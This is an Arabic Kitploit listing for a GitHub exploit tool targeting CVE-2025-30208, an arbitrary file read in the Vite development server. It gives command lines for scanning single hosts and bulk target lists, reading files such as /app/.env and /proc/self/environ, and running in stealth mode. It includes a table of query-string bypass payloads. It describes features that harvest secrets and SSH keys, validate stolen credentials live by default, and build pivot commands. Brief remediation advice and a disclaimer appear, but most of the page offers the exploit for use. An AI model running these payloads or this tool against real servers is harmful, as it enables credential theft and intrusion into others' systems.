Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-30208 | Kitploit
أدوات/GitHubGitHub/hazavvip/cve-2025-30208
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتجمع المعلوماتاختبار الاختراق
GitHubhazavvip/cve-2025-30208

CVE-2025-30208

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-30208 — قراءة ملفات تعسفية في Vite · v5

CVE: CVE-2025-30208
GHSA: GHSA-x574-m823-4x7w
الشدة: CVSS 5.3 متوسطة (خادم تطوير يمكن الوصول إليه عبر الشبكة)

⚠ للاستخدامات الأمنية المصرح بها فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها غير قانوني.


الوصف

يسمح خادم التطوير في Vite بتقديم ملفات تعسفية من نظام ملفات المضيف عبر طلبات /@fs/.
في الإصدارات المتأثرة، يتيح غياب فحص تعقيم سلسلة الاستعلام للمهاجم إلحاق لواحق مصممة خصيصًا لتجاوز القائمة المسموحة وقراءة أي ملف يمكن للعملية الوصول إليه — بما في ذلك ملفات .env ومفاتيح SSH الخاصة وبيانات اعتماد السحابة وإدخالات /proc.


الإصدارات المتأثرة

الفرعآخر إصدار قابل للاستغلالالإصدار المُصحَّح
6.3.x6.3.06.3.1+
6.2.x6.2.26.2.3+
6.1.x6.1.16.1.2+
6.0.x6.0.116.0.12+
5.4.x5.4.145.4.15+
4.5.x4.5.94.5.10+

متغيرات التجاوز


التثبيت

root@kitploit:~
pip install requests
# or
pip install -r requirements.txt

الاستخدام

هدف واحد — فحص كامل

root@kitploit:~
python main.py -t https://target.com

سلسلة استغلال كاملة (تحقق مباشر من بيانات الاعتماد، السلوك الافتراضي)

root@kitploit:~
python main.py -t https://target.com --full-chain --output /tmp/report

قراءة ملف محدد

root@kitploit:~
python main.py -t https://target.com --file /app/.env
python main.py -t https://target.com --file /proc/self/environ --save ./environ.txt

وضع التخفي (تأخيرات عشوائية) + بروكسي وسيط

root@kitploit:~
python main.py -t https://target.com --stealth --proxy http://127.0.0.1:8080

فحص مجمّع من قائمة أهداف

root@kitploit:~
python main.py -l targets.txt
python main.py -l targets.txt --workers 20 --ports 5173,3000,8080

مخرجات متوافقة مع الأنابيب (بدون رموز ANSI)

root@kitploit:~
python main.py -t https://target.com --no-color | tee scan.log

الإصدار

root@kitploit:~
python main.py --version

التشغيل كحزمة

root@kitploit:~
python -m cve30208 -t https://target.com

مرجع سطر الأوامر

منافذ الفحص المجمّع الافتراضية: 5173, 4173, 3000, 8080, 8000, 4000, 5000, 9000, 80, 443


المخرجات

عند تحديد --output /tmp/report يكتب الماسح:

  • /tmp/report.json — نتائج منظمة قابلة للقراءة آليًا
  • /tmp/report.md — تقرير Markdown قابل للقراءة البشرية

يطبع الفحص المجمّع دائمًا VULN_COUNT=N في السطر الأخير لسهولة البرمجة النصية في الصدفة:

root@kitploit:~
python main.py -l targets.txt | grep '^VULN_COUNT='

تطبع فحوصات الهدف الواحد SCAN_STATUS=VULNERABLE|NOT_VULNERABLE في النهاية لأغراض الأتمتة.


البنية المعمارية (v5)

root@kitploit:~
cve30208/
├── __init__.py      — public API surface
├── __main__.py      — python -m cve30208 entry point
├── constants.py     — BYPASS, CVE_SIBLING, SECRET_PATTERNS, SSH/scan constants
├── ui.py            — ANSI colour codes, Spin/NullSpin, terminal helpers
├── utils.py         — shared helpers (_unescape_js_string)
├── secrets.py       — scan_secrets(), parse_env(), parse_environ()
├── ssh.py           — extract_ssh_key(), collect_ssh_targets()
├── exploit.py       — ExploitResult, ExploitStage (live credential validation)
│                      includes a check registry for easier extension
├── report.py        — save_report(), make_md()
└── scanner.py       — FR/R dataclasses, Scanner, bulk_scan(), main()
main.py              — backwards-compatibility shim
requirements.txt

إزالة التكرارات

يستبعد الماسح تلقائيًا القطع الأثرية المتكررة بحيث تظل المخرجات نظيفة حتى عندما يساوي HOME قيمة /root أو يظهر السر نفسه في ملفات متعددة:

يُبلغ سطر الملخص عن عدد الملفات والأسرار ومفاتيح SSH التي تم استبعادها كبيانات مكررة، على سبيل المثال:

root@kitploit:~
  deduped     2 file(s), 4 credential(s), 1 SSH key(s) suppressed as duplicates

الإصلاح

  1. قم بترقية Vite إلى الإصدار المُصحَّح الخاص بفرعك (انظر الجدول أعلاه).
  2. لا تبدأ أبدًا خادم تطوير Vite باستخدام --host 0.0.0.0 على شبكات غير موثوقة.
  3. استبدل جميع الأسرار التي ربما تكون قد كُشفت (مفاتيح API، كلمات مرور قواعد البيانات، مفاتيح SSH).
  4. دقّق ملفات .env وأزل الأسرار غير الضرورية من المشروع.

الشروط القانونية

هذه الأداة مقدمة لاختبار الاختراق والبحث الأمني المصرح بهما فقط.
باستخدامك لهذه الأداة فإنك تقرّ بأن لديك إذنًا كتابيًا صريحًا لاختبار الأنظمة المستهدفة.
لا يتحمل المؤلفون أي مسؤولية عن أي إساءة استخدام أو ضرر يسببه هذا البرنامج.


CVE-2025-30208 PoC v5

ملاحظة حول مخطط JSON

يتضمن ملف JSON المُنشأ الآن:

  • schema_version (الحالي: 1.0.0)
  • status (VULNERABLE أو NOT_VULNERABLE)
  • safe_mode (true عند تفعيل وضع تنقيح الأسرار في الطرفية)
  • report_redacted (true عند وجود سر واحد على الأقل وتم تنقيحه في التقارير المحفوظة)
  • يتم دائمًا تنقيح القيم السرية المحفوظة في ملفات تقارير JSON/Markdown
تنزيل الأداة
الاسماللاحقة / الاستعلامالوصف
raw???raw??اللاحقة ?? تكسر rawRE
import&raw???import&raw??دمج وحدة ES مع raw
raw??raw?علامة ? لاحقة مفردة
url&raw???url&raw??دمج وضع URL
raw&url???raw&url??ترتيب معكوس للمعاملات
import&?raw?import&?rawبادئة import تالفة
sec-fetch?raw + ترويسة Sec-Fetchسياق سكربت المتصفح
raw-encoded?raw%3f%3fفواصل بترميز URL
double-slash?raw??/تجاوز بلاحقة الشرطة المائلة المزدوجة (v5)
pct-all%3fraw%3f%3fاستعلام مرمَّز بالكامل بنسبة مئوية (v5)
raw-hash?raw??#تجاوز عبر مرساة المقطع (v5)
wasm-init?inline=1.wasm?initشقيق CVE-2025-31125 (تهيئة wasm)
العلامةالافتراضيالوصف
-t/--target—رابط هدف واحد
-l/--lists—ملف يحتوي على هدف واحد في كل سطر
--stealthoffإضافة تأخيرات عشوائية بين الطلبات
--proxy—بروكسي HTTP/HTTPS (http://host:port)
--timeout10مهلة زمنية لكل طلب بالثواني
--verifyoffتفعيل التحقق من شهادة TLS
--file—قراءة مسار محدد على المضيف الهدف
--save—حفظ محتوى --file في مسار محلي
--full-chainonتشغيل سلسلة الاستغلال الكاملة (التحقق المباشر هو الافتراضي)
--output—كتابة تقرير JSON + Markdown إلى هذا المسار الأساسي
--workers10عاملات متوازية للفحص المجمّع
--portsانظر أدناهمنافذ مفصولة بفواصل لاستكشافها في وضع الفحص المجمّع
--no-color/--plainoffتعطيل رموز الألوان ANSI
--safe-modeoffتنقيح القيم السرية في مخرجات الطرفية
--show-secretsoffإظهار الأسرار كاملة في الطرفية (يتجاوز --safe-mode)
--version—طباعة الإصدار والخروج
الطبقةالآلية
قراءات نظام الملفاتيقوم stage_fs بتطبيع القائمة الأساسية لمفاتيح SSH باستخدام dict.fromkeys ويتجاهل المسارات المكررة من قائمة انتظار reads قبل إنتاج أي مخرجات.
حفظ الملفاتيتحقق Scanner._save من مجموعة _seen_file_paths لكل فحص؛ وتعيد المسارات المكررة FR المخزّن مسبقًا دون إعادة إضافته إلى r.files.
الأسراريزيل Scanner._save التكرارات من r.secrets عالميًا حسب (name, value) عبر جميع الملفات؛ ويُتعامل مع إزالة التكرار داخل الملف الواحد بشكل منفصل في scan_secrets.
مفاتيح SSHيدمج stage_ssh المفاتيح ذات التوقيع PEM نفسه (أول _PEM_SIG_LEN بايت) التي تظهر عبر ملفات مصدر متعددة.
أوامر التوجيه (Pivot)تُفهرَس كتل التوجيه حسب (key_source, host, port)؛ وتُطبع التركيبات المتطابقة مرة واحدة فقط.